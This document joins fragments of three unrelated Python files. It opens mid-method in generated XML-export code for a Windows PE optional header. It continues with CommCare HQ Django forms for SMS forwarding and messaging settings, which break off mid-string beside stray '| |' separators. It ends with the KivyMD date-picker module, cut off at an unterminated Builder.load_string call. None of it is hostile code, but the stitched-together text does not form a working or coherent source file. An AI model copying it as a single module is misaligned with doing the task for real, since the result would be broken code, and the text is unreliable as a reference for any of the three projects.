if self.Data_Directory is not None:
self.Data_Directory.export(outfile, level, namespace_, name_='Data_Directory')
if self.Hashes is not None:
self.Hashes.export(outfile, level, namespace_, name_='Hashes')
def hasContent_(self):
if (
self.Magic is not None or
self.Major_Linker_Version is not None or
self.Minor_Linker_Version is not None or
self.Size_Of_Code is not None or
self.Size_Of_Initialized_Data is not None or
self.Size_Of_Uninitialized_Data is not None or
self.Address_Of_Entry_Point is not None or
self.Base_Of_Code is not None or
self.Base_Of_Data is not None or
self.Image_Base is not None or
self.Section_Alignment is not None or
self.File_Alignment is not None or
self.Major_OS_Version is not None or
self.Minor_OS_Version is not None or
self.Major_Image_Version is not None or
self.Minor_Image_Version is not None or
self.Major_Subsystem_Version is not None or
self.Minor_Subsystem_Version is not None or
self.Win32_Version_Value is not None or
self.Size_Of_Image is not None or
self.Size_Of_Headers is not None or
self.Checksum is not None or
self.Subsystem is not None or
self.DLL_Characteristics is not None or
self.Size_Of_Stack_Reserve is not None or
self.Size_Of_Stack_Commit is not None or
self.Size_Of_Heap_Reserve is not None or
self.Size_Of_Heap_Commit is not None or
self.Loader_Flags is not None or
self.Number_Of_Rva_And_Sizes is not None or
self.Data_Directory is not None or
self.Hashes is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='PEOptionalHeaderType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.Magic is not None:
showIndent(outfile, level)
outfile.write('Magic=%s,\n' % quote_python(self.Magic).encode(ExternalEncoding))
if self.Major_Linker_Version is not None:
showIndent(outfile, level)
outfile.write('Major_Linker_Version=%s,\n' % quote_python(self.Major_Linker_Version).encode(ExternalEncoding))
if self.Minor_Linker_Version is not None:
showIndent(outfile, level)
outfile.write('Minor_Linker_Version=%s,\n' % quote_python(self.Minor_Linker_Version).encode(ExternalEncoding))
if self.Size_Of_Code is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Code=%s,\n' % quote_python(self.Size_Of_Code).encode(ExternalEncoding))
if self.Size_Of_Initialized_Data is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Initialized_Data=%s,\n' % quote_python(self.Size_Of_Initialized_Data).encode(ExternalEncoding))
if self.Size_Of_Uninitialized_Data is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Uninitialized_Data=%s,\n' % quote_python(self.Size_Of_Uninitialized_Data).encode(ExternalEncoding))
if self.Address_Of_Entry_Point is not None:
showIndent(outfile, level)
outfile.write('Address_Of_Entry_Point=%s,\n' % quote_python(self.Address_Of_Entry_Point).encode(ExternalEncoding))
if self.Base_Of_Code is not None:
showIndent(outfile, level)
outfile.write('Base_Of_Code=%s,\n' % quote_python(self.Base_Of_Code).encode(ExternalEncoding))
if self.Base_Of_Data is not None:
showIndent(outfile, level)
outfile.write('Base_Of_Data=%s,\n' % quote_python(self.Base_Of_Data).encode(ExternalEncoding))
if self.Image_Base is not None:
showIndent(outfile, level)
outfile.write('Image_Base=%s,\n' % quote_python(self.Image_Base).encode(ExternalEncoding))
if self.Section_Alignment is not None:
showIndent(outfile, level)
outfile.write('Section_Alignment=%s,\n' % quote_python(self.Section_Alignment).encode(ExternalEncoding))
if self.File_Alignment is not None:
showIndent(outfile, level)
outfile.write('File_Alignment=%s,\n' % quote_python(self.File_Alignment).encode(ExternalEncoding))
if self.Major_OS_Version is not None:
showIndent(outfile, level)
outfile.write('Major_OS_Version=%s,\n' % quote_python(self.Major_OS_Version).encode(ExternalEncoding))
if self.Minor_OS_Version is not None:
showIndent(outfile, level)
outfile.write('Minor_OS_Version=%s,\n' % quote_python(self.Minor_OS_Version).encode(ExternalEncoding))
if self.Major_Image_Version is not None:
showIndent(outfile, level)
outfile.write('Major_Image_Version=%s,\n' % quote_python(self.Major_Image_Version).encode(ExternalEncoding))
if self.Minor_Image_Version is not None:
showIndent(outfile, level)
outfile.write('Minor_Image_Version=%s,\n' % quote_python(self.Minor_Image_Version).encode(ExternalEncoding))
if self.Major_Subsystem_Version is not None:
showIndent(outfile, level)
outfile.write('Major_Subsystem_Version=%s,\n' % quote_python(self.Major_Subsystem_Version).encode(ExternalEncoding))
if self.Minor_Subsystem_Version is not None:
showIndent(outfile, level)
outfile.write('Minor_Subsystem_Version=%s,\n' % quote_python(self.Minor_Subsystem_Version).encode(ExternalEncoding))
if self.Win32_Version_Value is not None:
showIndent(outfile, level)
outfile.write('Win32_Version_Value=%s,\n' % quote_python(self.Win32_Version_Value).encode(ExternalEncoding))
if self.Size_Of_Image is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Image=%s,\n' % quote_python(self.Size_Of_Image).encode(ExternalEncoding))
if self.Size_Of_Headers is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Headers=%s,\n' % quote_python(self.Size_Of_Headers).encode(ExternalEncoding))
if self.Checksum is not None:
showIndent(outfile, level)
outfile.write('Checksum=%s,\n' % quote_python(self.Checksum).encode(ExternalEncoding))
if self.Subsystem is not None:
showIndent(outfile, level)
outfile.write('Subsystem=%s,\n' % quote_python(self.Subsystem).encode(ExternalEncoding))
if self.DLL_Characteristics is not None:
showIndent(outfile, level)
outfile.write('DLL_Characteristics=%s,\n' % quote_python(self.DLL_Characteristics).encode(ExternalEncoding))
if self.Size_Of_Stack_Reserve is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Stack_Reserve=%s,\n' % quote_python(self.Size_Of_Stack_Reserve).encode(ExternalEncoding))
if self.Size_Of_Stack_Commit is not None:
showIndent(outfile, level)
outfile.write('Size_Of_Stack_Commit=%s,\n' % quote_python(self.Size_Of_Stack_Commit).encode(ExternalEncoding))
import json
import re
from django import forms
from django.conf import settings
from django.core.exceptions import ValidationError
from django.forms.fields import *
from django.forms.forms import Form
from django.urls import reverse
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy, ugettext_noop
from couchdbkit.exceptions import ResourceNotFound
from crispy_forms import bootstrap as twbscrispy
from crispy_forms import layout as crispy
from crispy_forms.bootstrap import InlineField, StrictButton
from crispy_forms.layout import Div
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.django.fields import TrimmedCharField
from corehq.apps.app_manager.dbaccessors import get_built_app_ids
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.models import DayTimeWindow
from corehq.apps.groups.models import Group
from corehq.apps.hqwebapp import crispy as hqcrispy
from corehq.apps.hqwebapp.crispy import HQFormHelper
from corehq.apps.hqwebapp.widgets import SelectToggle
from corehq.apps.locations.models import SQLLocation
from corehq.apps.reminders.forms import validate_time
from corehq.apps.sms.models import (
FORWARD_ALL,
FORWARD_BY_KEYWORD,
SQLMobileBackend,
)
from corehq.apps.sms.util import (
ALLOWED_SURVEY_DATE_FORMATS,
get_sms_backend_classes,
strip_plus,
validate_phone_number,
)
from corehq.apps.users.models import CommCareUser
FORWARDING_CHOICES = (
(FORWARD_ALL, ugettext_noop("All messages")),
(FORWARD_BY_KEYWORD, ugettext_noop("All messages starting with a keyword")),
)
ENABLED = "ENABLED"
DISABLED = "DISABLED"
ENABLED_DISABLED_CHOICES = (
(DISABLED, ugettext_noop("Disabled")),
(ENABLED, ugettext_noop("Enabled")),
)
DEFAULT = "DEFAULT"
CUSTOM = "CUSTOM"
DEFAULT_CUSTOM_CHOICES = (
(DEFAULT, ugettext_noop("Default")),
(CUSTOM, ugettext_noop("Custom")),
)
MESSAGE_COUNTER_CHOICES = (
(DEFAULT, ugettext_noop("Don't use counter")),
(CUSTOM, ugettext_noop("Use counter with threshold:")),
)
SMS_CONVERSATION_LENGTH_CHOICES = (
(5, 5),
(10, 10),
(15, 15),
(20, 20),
(25, 25),
(30, 30),
)
SHOW_ALL = "SHOW_ALL"
SHOW_INVALID = "SHOW_INVALID"
HIDE_ALL = "HIDE_ALL"
TIME_BEFORE = "BEFORE"
TIME_AFTER = "AFTER"
TIME_BETWEEN = "BETWEEN"
WELCOME_RECIPIENT_NONE = 'NONE'
WELCOME_RECIPIENT_CASE = 'CASE'
WELCOME_RECIPIENT_MOBILE_WORKER = 'MOBILE_WORKER'
WELCOME_RECIPIENT_ALL = 'ALL'
WELCOME_RECIPIENT_CHOICES = (
(WELCOME_RECIPIENT_NONE, ugettext_lazy('Nobody')),
(WELCOME_RECIPIENT_CASE, ugettext_lazy('Cases only')),
(WELCOME_RECIPIENT_MOBILE_WORKER, ugettext_lazy('Mobile Workers only')),
(WELCOME_RECIPIENT_ALL, ugettext_lazy('Cases and Mobile Workers')),
)
class ForwardingRuleForm(Form):
forward_type = ChoiceField(choices=FORWARDING_CHOICES)
keyword = CharField(required=False)
backend_id = CharField()
def __init__(self, *args, **kwargs):
super(ForwardingRuleForm, self).__init__(*args, **kwargs)
self.helper = HQFormHelper()
self.helper.layout = crispy.Layout(
crispy.Fieldset(
_('Forwarding Rule Options'),
'forward_type',
crispy.Div(
'keyword',
css_id="keyword_row",
css_class='hide',
),
'backend_id',
hqcrispy.FormActions(
twbscrispy.StrictButton(
_("Submit"),
type="submit",
css_class="btn btn-primary",
),
),
)
)
def clean_keyword(self):
forward_type = self.cleaned_data.get("forward_type")
keyword = self.cleaned_data.get("keyword", "").strip()
if forward_type == FORWARD_BY_KEYWORD:
if keyword == "":
raise ValidationError(_("This field is required."))
return keyword
else:
return None
class LoadBalancingBackendFormMixin(Form):
phone_numbers = CharField(required=False)
def clean_phone_numbers(self):
"""
Expects a list of [{"phone_number": <phone number>}] as the value.
"""
value = self.cleaned_data.get("phone_numbers")
result = []
try:
value = json.loads(value)
assert isinstance(value, list)
for item in value:
assert isinstance(item, dict)
assert "phone_number" in item
result.append(item["phone_number"])
except (AssertionError, ValueError):
raise ValidationError(_("Something went wrong. Please reload the "
"page and try again."))
if len(result) == 0:
raise ValidationError(_("You must specify at least one phone"
"number."))
for phone_number in result:
validate_phone_number(phone_number)
return result
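# Example of the value clean_phone_numbers() expects (illustrative, not taken from the original
# code): the field posts a JSON-encoded list of objects such as
#     [{"phone_number": "+15551234567"}, {"phone_number": "+15557654321"}]
# which is parsed into ["+15551234567", "+15557654321"], and each entry is then checked with
# validate_phone_number().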
class SettingsForm(Form):
# General Settings
use_default_sms_response = ChoiceField(
required=False,
label=ugettext_noop("Default SMS Response"),
choices=ENABLED_DISABLED_CHOICES,
)
default_sms_response = TrimmedCharField(
required=False,
label="",
)
use_restricted_sms_times = ChoiceField(
required=False,
label=ugettext_noop("Send SMS on..."),
choices=(
(DISABLED, ugettext_noop("any day, at any time")),
(ENABLED, ugettext_noop("only specific days and times")),
),
)
restricted_sms_times_json = CharField(
required=False,
widget=forms.HiddenInput,
)
sms_survey_date_format = ChoiceField(
required=False,
label=ugettext_lazy("SMS Survey Date Format"),
choices=(
(df.human_readable_format, ugettext_lazy(df.human_readable_format))
for df in ALLOWED_SURVEY_DATE_FORMATS
),
)
# Chat Settings
use_custom_case_username = ChoiceField(
required=False,
choices=DEFAULT_CUSTOM_CHOICES,
)
custom_case_username = TrimmedCharField(
required=False,
label=ugettext_noop("Enter a Case Property"),
)
use_custom_message_count_threshold = ChoiceField(
required=False,
choices=MESSAGE_COUNTER_CHOICES,
)
custom_message_count_threshold = IntegerField(
required=False,
label=ugettext_noop("Enter a Number"),
)
use_sms_conversation_times = ChoiceField(
required=False,
label=ugettext_noop("Delay Automated SMS"),
choices=ENABLED_DISABLED_CHOICES,
widget=SelectToggle(choices=ENABLED_DISABLED_CHOICES, attrs={"ko_value": "use_sms_conversation_times"}),
)
sms_conversation_times_json = CharField(
required=False,
widget=forms.HiddenInput,
)
sms_conversation_length = ChoiceField(
required=False,
label=ugettext_noop("Conversation Duration"),
choices=SMS_CONVERSATION_LENGTH_CHOICES,
)
survey_traffic_option = ChoiceField(
required=False,
label=ugettext_noop("Survey Traffic"),
choices=(
(SHOW_ALL, ugettext_noop("Show all survey traffic")),
(SHOW_INVALID, ugettext_noop("Hide all survey traffic except "
"invalid responses")),
(HIDE_ALL, ugettext_noop("Hide all survey traffic")),
),
)
count_messages_as_read_by_anyone = ChoiceField(
required=False,
label=ugettext_noop("A Message is Read..."),
choices=(
(ENABLED, ugettext_noop("when it is read by anyone")),
(DISABLED, ugettext_noop("only for the user that reads it")),
),
)
use_custom_chat_template = ChoiceField(
required=False,
choices=DEFAULT_CUSTOM_CHOICES,
)
custom_chat_template = TrimmedCharField(
required=False,
label=ugettext_noop("Enter Chat Template Identifier"),
)
# Registration settings
sms_case_registration_enabled = ChoiceField(
required=False,
choices=ENABLED_DISABLED_CHOICES,
label=ugettext_noop("Case Self-Registration"),
)
sms_case_registration_type = TrimmedCharField(
required=False,
label=ugettext_noop("Default Case Type"),
)
sms_case_registration_owner_id = CharField(
required=False,
label=ugettext_noop("Default Case Owner"),
widget=forms.Select(choices=[]),
)
sms_case_registration_user_id = CharField(
required=False,
label=ugettext_noop("Registration Submitter"),
widget=forms.Select(choices=[]),
)
sms_mobile_worker_registration_enabled = ChoiceField(
required=False,
choices=ENABLED_DISABLED_CHOICES,
label=ugettext_noop("SMS Mobile Worker Registration"),
)
registration_welcome_message = ChoiceField(
choices=WELCOME_RECIPIENT_CHOICES,
label=ugettext_lazy("Send registration welcome message to"),
)
# Internal settings
override_daily_outbound_sms_limit = ChoiceField(
required=False,
choices=ENABLED_DISABLED_CHOICES,
label=ugettext_lazy("Override Daily Outbound SMS Limit"),
)
custom_daily_outbound_sms_limit = IntegerField(
required=False,
label=ugettext_noop("Daily Outbound SMS Limit"),
min_value=1000,
)
@property
def section_general(self):
fields = [
hqcrispy.B3MultiField(
_("Default SMS Response"),
crispy.Div(
InlineField(
"use_default_sms_response",
data_bind="value: use_default_sms_response",
),
css_class='col-sm-4'
),
crispy.Div(
InlineField(
"default_sms_response",
css_class="input-xxlarge",
placeholder=_("Enter Default Response"),
data_bind="visible: showDefaultSMSResponse",
),
css_class='col-sm-8'
),
help_bubble_text=_("Enable this option to provide a "
"default response when a user's incoming SMS does not "
"answer an open survey or match a known keyword."),
css_id="default-sms-response-group",
field_class='col-sm-6 col-md-9 col-lg-9'
),
hqcrispy.FieldWithHelpBubble(
"use_restricted_sms_times",
data_bind="value: use_restricted_sms_times",
help_bubble_text=_("Use this option to limit the times "
"that SMS messages can be sent to users. Messages that "
"are sent outside these windows will remained queued "
"and will go out as soon as another window opens up."),
),
hqcrispy.B3MultiField(
"",
hqcrispy.HiddenFieldWithErrors("restricted_sms_times_json",
data_bind="value: restricted_sms_times_json"),
crispy.Div(
data_bind="template: {"
" name: 'ko-template-restricted-sms-times', "
" data: $data"
"}",
),
data_bind="visible: showRestrictedSMSTimes",
),
hqcrispy.FieldWithHelpBubble(
'sms_survey_date_format',
help_bubble_text=_("Choose the format in which date questions "
"should be answered in SMS surveys."),
),
]
return crispy.Fieldset(
_("General Settings"),
*fields
)
@property
def section_registration(self):
fields = [
hqcrispy.FieldWithHelpBubble(
"sms_case_registration_enabled",
help_bubble_text=_("When this option is enabled, a person "
"can send an SMS into the system saying 'join "
"[project]', where [project] is your project "
"space name, and the system will automatically "
"create a case tied to that person's phone number."),
data_bind="value: sms_case_registration_enabled",
),
crispy.Div(
hqcrispy.FieldWithHelpBubble(
"sms_case_registration_type",
placeholder=_("Enter a Case Type"),
help_bubble_text=_("Cases that self-register over SMS "
"will be given this case type."),
),
hqcrispy.FieldWithHelpBubble(
"sms_case_registration_owner_id",
help_bubble_text=_("Cases that self-register over SMS "
"will be owned by this user or user group."),
),
hqcrispy.FieldWithHelpBubble(
"sms_case_registration_user_id",
help_bubble_text=_("The form submission for a "
"self-registration will belong to this user."),
),
data_bind="visible: showRegistrationOptions",
),
hqcrispy.FieldWithHelpBubble(
"sms_mobile_worker_registration_enabled",
help_bubble_text=_("When this option is enabled, a person "
"can send an SMS into the system saying 'join "
"[project] worker [username]' (where [project] is your "
" project space and [username] is an optional username)"
", and the system will add them as a mobile worker."),
),
hqcrispy.FieldWithHelpBubble(
'registration_welcome_message',
help_bubble_text=_("Choose whether to send an automatic "
"welcome message to cases, mobile workers, or both, "
"after they self-register. The welcome message can be "
"configured in the SMS languages and translations page "
"(Messaging -> Languages -> Messaging Translations)."),
),
]
return crispy.Fieldset(
_("Registration Settings"),
*fields
)
@property
def section_chat(self):
fields = [
hqcrispy.B3MultiField(
_("Case Name Display"),
crispy.Div(
InlineField(
"use_custom_case_username",
data_bind="value: use_custom_case_username",
),
css_class='col-sm-4'
),
crispy.Div(
InlineField(
"custom_case_username",
css_class="input-large",
data_bind="visible: showCustomCaseUsername",
),
css_class='col-sm-8'
),
help_bubble_text=_("By default, when chatting with a case, "
"the chat window will use the case's \"name\" case "
"property when displaying the case's name. To use a "
"different case property, specify it here."),
css_id="custom-case-username-group",
field_class='col-sm-6 col-md-9 col-lg-9'
),
hqcrispy.B3MultiField(
_("Message Counter"),
crispy.Div(
InlineField(
"use_custom_message_count_threshold",
data_bind="value: use_custom_message_count_threshold",
),
css_class='col-sm-4'
),
crispy.Div(
InlineField(
"custom_message_count_threshold",
css_class="input-large",
data_bind="visible: showCustomMessageCountThreshold",
),
css_class='col-sm-8'
),
help_bubble_text=_("The chat window can use a counter to keep "
"track of how many messages are being sent and received "
"and highlight that number after a certain threshold is "
"reached. By default, the counter is disabled. To enable "
"it, enter the desired threshold here."),
css_id="custom-message-count-threshold-group",
field_class='col-sm-6 col-md-9 col-lg-9'
),
hqcrispy.FieldWithHelpBubble(
"use_sms_conversation_times",
help_bubble_text=_("When this option is enabled, the system "
"will not send automated SMS to chat recipients when "
"those recipients are in the middle of a conversation."),
),
hqcrispy.B3MultiField(
"",
hqcrispy.HiddenFieldWithErrors("sms_conversation_times_json",
data_bind="value: sms_conversation_times_json"),
crispy.Div(
data_bind="template: {"
" name: 'ko-template-sms-conversation-times', "
" data: $data"
"}",
),
data_bind="visible: showSMSConversationTimes",
label_class='hide',
field_class='col-md-12 col-lg-10'
),
crispy.Div(
hqcrispy.FieldWithHelpBubble(
"sms_conversation_length",
help_bubble_text=_("The number of minutes to wait "
"after receiving an incoming SMS from a chat "
"recipient before resuming automated SMS to that "
"recipient."),
),
data_bind="visible: showSMSConversationTimes",
),
hqcrispy.FieldWithHelpBubble(
"survey_traffic_option",
help_bubble_text=_("This option allows you to hide a chat "
"recipient's survey questions and responses from chat "
"windows. There is also the option to show only invalid "
"responses to questions in the chat window, which could "
"be attempts to converse."),
),
hqcrispy.FieldWithHelpBubble(
"count_messages_as_read_by_anyone",
help_bubble_text=_("The chat window will mark unread "
"messages to the user viewing them. Use this option to "
"control whether a message counts as being read if it "
"is read by anyone, or if it | |
# -*- coding: utf-8 -*-
"""
Pickers
=======
Copyright (c) 2015 <NAME> and KivyMD contributors -
KivyMD library up to version 0.1.2
Copyright (c) 2019 <NAME> and KivyMD contributors -
KivyMD library version 0.1.3 and higher
For suggestions and questions:
<<EMAIL>>
This file is distributed under the terms of the same license,
as the Kivy framework.
Includes date, time and color picker
"""
import datetime
import calendar
from datetime import date
from kivy.lang import Builder
from kivy.uix.modalview import ModalView
from kivy.uix.floatlayout import FloatLayout
from kivy.properties import StringProperty, NumericProperty, ObjectProperty,\
BooleanProperty, ListProperty, OptionProperty
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.behaviors import ButtonBehavior
from kivy.clock import Clock
from kivy.core.window import Window
from kivy.utils import get_color_from_hex
from kivymd.label import MDLabel
from kivymd.button import MDIconButton
from kivymd.theming import ThemableBehavior
from kivymd.backgroundcolorbehavior import SpecificBackgroundColorBehavior
from kivymd.ripplebehavior import CircularRippleBehavior
from kivymd.elevation import RectangularElevationBehavior
from kivymd.color_definitions import colors, palette
Builder.load_string('''
#:import calendar calendar
#:import platform platform
<MDDatePicker>
cal_layout: cal_layout
size_hint: (None, None)
size:
[dp(328), dp(484)] if self.theme_cls.device_orientation == 'portrait'\
else [dp(512), dp(304)]
pos_hint: {'center_x': .5, 'center_y': .5}
canvas:
Color:
rgb: app.theme_cls.primary_color
Rectangle:
size:
[dp(328), dp(96)]\
if self.theme_cls.device_orientation == 'portrait'\
else [dp(168), dp(304)]
pos:
[root.pos[0], root.pos[1] + root.height - dp(96)]\
if self.theme_cls.device_orientation == 'portrait'\
else [root.pos[0], root.pos[1] + root.height - dp(304)]
Color:
rgb: app.theme_cls.bg_normal
Rectangle:
size:
[dp(328), dp(484)-dp(96)]\
if self.theme_cls.device_orientation == 'portrait'\
else [dp(344), dp(304)]
pos:
[root.pos[0], root.pos[1] + root.height - dp(96) - (dp(484) - dp(96))]\
if self.theme_cls.device_orientation == 'portrait'\
else [root.pos[0] + dp(168), root.pos[1]]
MDLabel:
id: label_full_date
font_style: 'H4'
text_color: root.specific_text_color
theme_text_color: 'Custom'
size_hint: (None, None)
size:
[root.width, dp(30)]\
if root.theme_cls.device_orientation == 'portrait'\
else [dp(168), dp(30)]
pos:
[root.pos[0] + dp(23), root.pos[1] + root.height - dp(74)]\
if root.theme_cls.device_orientation == 'portrait'\
else [root.pos[0] + dp(3), root.pos[1] + dp(214)]
line_height: .84
valign: 'middle'
text_size:
[root.width, None]\
if root.theme_cls.device_orientation == 'portrait'\
else [dp(149), None]
bold: True
text:
root.fmt_lbl_date(root.sel_year, root.sel_month, root.sel_day,\
root.theme_cls.device_orientation)
MDLabel:
id: label_year
font_style: 'Subtitle1'
text_color: root.specific_text_color
theme_text_color: 'Custom'
size_hint: (None, None)
size: root.width, dp(30)
pos:
(root.pos[0] + dp(23), root.pos[1] + root.height-dp(40))\
if root.theme_cls.device_orientation == 'portrait'\
else (root.pos[0]+dp(16), root.pos[1]+root.height-dp(41))
valign: 'middle'
text: str(root.sel_year)
GridLayout:
id: cal_layout
cols: 7
size:
(dp(44 * 7), dp(40 * 7))\
if root.theme_cls.device_orientation == 'portrait'\
else (dp(46 * 7), dp(32 * 7))
col_default_width:
dp(42) if root.theme_cls.device_orientation == 'portrait'\
else dp(39)
size_hint: (None, None)
padding:
(dp(2), 0) if root.theme_cls.device_orientation == 'portrait'\
else (dp(7), 0)
spacing:
(dp(2), 0) if root.theme_cls.device_orientation == 'portrait'\
else (dp(7), 0)
pos:
(root.pos[0] + dp(10), root.pos[1] + dp(60))\
if root.theme_cls.device_orientation == 'portrait'\
else (root.pos[0] + dp(168) + dp(8), root.pos[1] + dp(48))
MDLabel:
id: label_month_selector
font_style: 'Body2'
text:
calendar.month_name[root.month].capitalize() + ' ' + str(root.year)
size_hint: (None, None)
size: root.width, dp(30)
pos: root.pos
theme_text_color: 'Primary'
pos_hint:
{'center_x': .5, 'center_y': .75}\
if self.theme_cls.device_orientation == 'portrait'\
else {'center_x': .67, 'center_y': .915}
valign: "middle"
halign: "center"
MDIconButton:
icon: 'chevron-left'
theme_text_color: 'Secondary'
pos_hint:
{'center_x': .08, 'center_y': .745}\
if root.theme_cls.device_orientation == 'portrait'\
else {'center_x': .39, 'center_y': .925}
on_release: root.change_month('prev')
MDIconButton:
icon: 'chevron-right'
theme_text_color: 'Secondary'
pos_hint:
{'center_x': .92, 'center_y': .745}\
if root.theme_cls.device_orientation == 'portrait'\
else {'center_x': .94, 'center_y': .925}
on_release: root.change_month('next')
MDFlatButton:
width: dp(32)
id: ok_button
pos:
root.pos[0] + root.size[0] - self.width - dp(10), root.pos[1] + dp(10)
text: "OK"
on_release: root.ok_click()
MDFlatButton:
id: cancel_button
pos: root.pos[0] + root.size[0] - self.width - ok_button.width - dp(10), root.pos[1] + dp(10)
text: "Cancel"
on_release: root.dismiss()
<DayButton>
size_hint: None, None
size:
(dp(40), dp(40)) if root.theme_cls.device_orientation == 'portrait'\
else (dp(32), dp(32))
MDLabel:
font_style: 'Caption'
theme_text_color:
'Custom' if root.is_today and not root.is_selected else 'Primary'
text_color: root.theme_cls.primary_color
opposite_colors:
root.is_selected if root.owner.sel_month == root.owner.month\
and root.owner.sel_year == root.owner.year\
and str(self.text) == str(root.owner.sel_day) else False
size_hint_x: None
valign: 'middle'
halign: 'center'
text: root.text
<WeekdayLabel>
font_style: 'Caption'
theme_text_color: 'Secondary'
size: (dp(40), dp(40)) if root.theme_cls.device_orientation == 'portrait'\
else (dp(32), dp(32))
size_hint: None, None
text_size: self.size
valign:
'middle' if root.theme_cls.device_orientation == 'portrait'\
else 'bottom'
halign: 'center'
<DaySelector>
size:
(dp(40), dp(40)) if root.theme_cls.device_orientation == 'portrait'\
else (dp(32), dp(32))
size_hint: (None, None)
canvas:
Color:
rgba: self.theme_cls.primary_color if self.shown else [0, 0, 0, 0]
Ellipse:
size:
(dp(40), dp(40))\
if root.theme_cls.device_orientation == 'portrait'\
else (dp(32), dp(32))
pos:
self.pos if root.theme_cls.device_orientation == 'portrait'\
else [self.pos[0], self.pos[1]]
''')
class DaySelector(ThemableBehavior, AnchorLayout):
shown = BooleanProperty(False)
def __init__(self, parent):
super(DaySelector, self).__init__()
self.parent_class = parent
self.parent_class.add_widget(self, index=7)
self.selected_widget = None
Window.bind(on_resize=self.move_resize)
def update(self):
parent = self.parent_class
if parent.sel_month == parent.month and parent.sel_year == parent.year:
self.shown = True
else:
self.shown = False
def set_widget(self, widget):
self.selected_widget = widget
self.pos = widget.pos
self.move_resize(do_again=True)
self.update()
def move_resize(self, window=None, width=None, height=None, do_again=True):
self.pos = self.selected_widget.pos
if do_again:
Clock.schedule_once(
lambda x: self.move_resize(do_again=False), .01)
class DayButton(ThemableBehavior, CircularRippleBehavior, ButtonBehavior,
AnchorLayout):
text = StringProperty()
owner = ObjectProperty()
is_today = BooleanProperty(False)
is_selected = BooleanProperty(False)
def on_release(self):
self.owner.set_selected_widget(self)
class WeekdayLabel(MDLabel):
pass
class MDDatePicker(FloatLayout, ThemableBehavior, RectangularElevationBehavior,
SpecificBackgroundColorBehavior, ModalView):
_sel_day_widget = ObjectProperty()
cal_list = None
cal_layout = ObjectProperty()
sel_year = NumericProperty()
sel_month = NumericProperty()
sel_day = NumericProperty()
day = NumericProperty()
month = NumericProperty()
year = NumericProperty()
today = date.today()
callback = ObjectProperty()
background_color = ListProperty([0, 0, 0, .7])
class SetDateError(Exception):
pass
def __init__(self, callback, year=None, month=None, day=None,
firstweekday=0, **kwargs):
self.callback = callback
self.cal = calendar.Calendar(firstweekday)
self.sel_year = year if year else self.today.year
self.sel_month = month if month else self.today.month
self.sel_day = day if day else self.today.day
self.month = self.sel_month
self.year = self.sel_year
self.day = self.sel_day
super(MDDatePicker, self).__init__(**kwargs)
self.selector = DaySelector(parent=self)
self.generate_cal_widgets()
self.update_cal_matrix(self.sel_year, self.sel_month)
self.set_month_day(self.sel_day)
self.selector.update()
def ok_click(self):
self.callback(date(self.sel_year, self.sel_month, self.sel_day))
self.dismiss()
def fmt_lbl_date(self, year, month, day, orientation):
d = datetime.date(int(year), int(month), int(day))
separator = '\n' if orientation == 'landscape' else ' '
return d.strftime('%a,').capitalize() + separator + d.strftime(
'%b').capitalize() + ' ' + str(day).lstrip('0')
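# Example (for illustration): fmt_lbl_date(2019, 5, 7, 'portrait') returns
# "Tue, May 7", while in 'landscape' the separator after the weekday becomes a
# newline, giving "Tue,\nMay 7".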
def set_date(self, year, month, day):
try:
date(year, month, day)
except Exception as e:
print(e)
if str(e) == "day is out of range for month":
raise self.SetDateError(
" Day %s day is out of range for month %s" % (day, month))
elif str(e) == "month must be in 1..12":
raise self.SetDateError(
"Month must be between 1 and 12, got %s" % month)
elif str(e) == "year is out of range":
raise self.SetDateError(
"Year must be between %s and %s, got %s" % (
datetime.MINYEAR, datetime.MAXYEAR, year))
else:
self.sel_year = year
self.sel_month = month
self.sel_day = day
self.month = self.sel_month
self.year = self.sel_year
self.day = self.sel_day
self.update_cal_matrix(self.sel_year, self.sel_month)
self.set_month_day(self.sel_day)
self.selector.update()
def set_selected_widget(self, widget):
if self._sel_day_widget:
self._sel_day_widget.is_selected = False
widget.is_selected = True
self.sel_month = int(self.month)
self.sel_year = int(self.year)
self.sel_day = int(widget.text)
self._sel_day_widget = widget
self.selector.set_widget(widget)
def set_month_day(self, day):
for idx in range(len(self.cal_list)):
if str(day) == str(self.cal_list[idx].text):
self._sel_day_widget = self.cal_list[idx]
self.sel_day = int(self.cal_list[idx].text)
if self._sel_day_widget:
self._sel_day_widget.is_selected = False
self._sel_day_widget = self.cal_list[idx]
self.cal_list[idx].is_selected = True
self.selector.set_widget(self.cal_list[idx])
def update_cal_matrix(self, year, month):
try:
dates = [x for x in self.cal.itermonthdates(year, month)]
except ValueError as e:
if str(e) == "year is out of range":
pass
else:
self.year = year
self.month = month
for idx in range(len(self.cal_list)):
if idx >= len(dates) or dates[idx].month != month:
self.cal_list[idx].disabled = True
self.cal_list[idx].text = ''
else:
self.cal_list[idx].disabled = False
self.cal_list[idx].text = str(dates[idx].day)
self.cal_list[idx].is_today = dates[idx] == self.today
self.selector.update()
def generate_cal_widgets(self):
cal_list = []
for day in self.cal.iterweekdays():
self.cal_layout.add_widget(
WeekdayLabel(text=calendar.day_abbr[day][0].upper()))
for i in range(6 * 7): # 6 weeks, 7 days a week
db = DayButton(owner=self)
cal_list.append(db)
self.cal_layout.add_widget(db)
self.cal_list = cal_list
def change_month(self, operation):
op = 1 if operation == 'next' else -1
sl, sy = self.month, self.year
m = 12 if sl + op == 0 else 1 if sl + op == 13 else sl + op
y = sy - 1 if sl + op == 0 else sy + 1 if sl + op == 13 else sy
self.update_cal_matrix(y, m)
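# Minimal usage sketch (app-side code, not part of this module; the callback
# name is arbitrary). MDDatePicker is a ModalView, so open() shows it, and the
# callback only fires from ok_click() with a datetime.date:
#
#     def on_date_selected(selected_date):
#         print('picked:', selected_date.isoformat())
#
#     MDDatePicker(callback=on_date_selected, year=2019, month=5, day=7).open()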
Builder.load_string('''
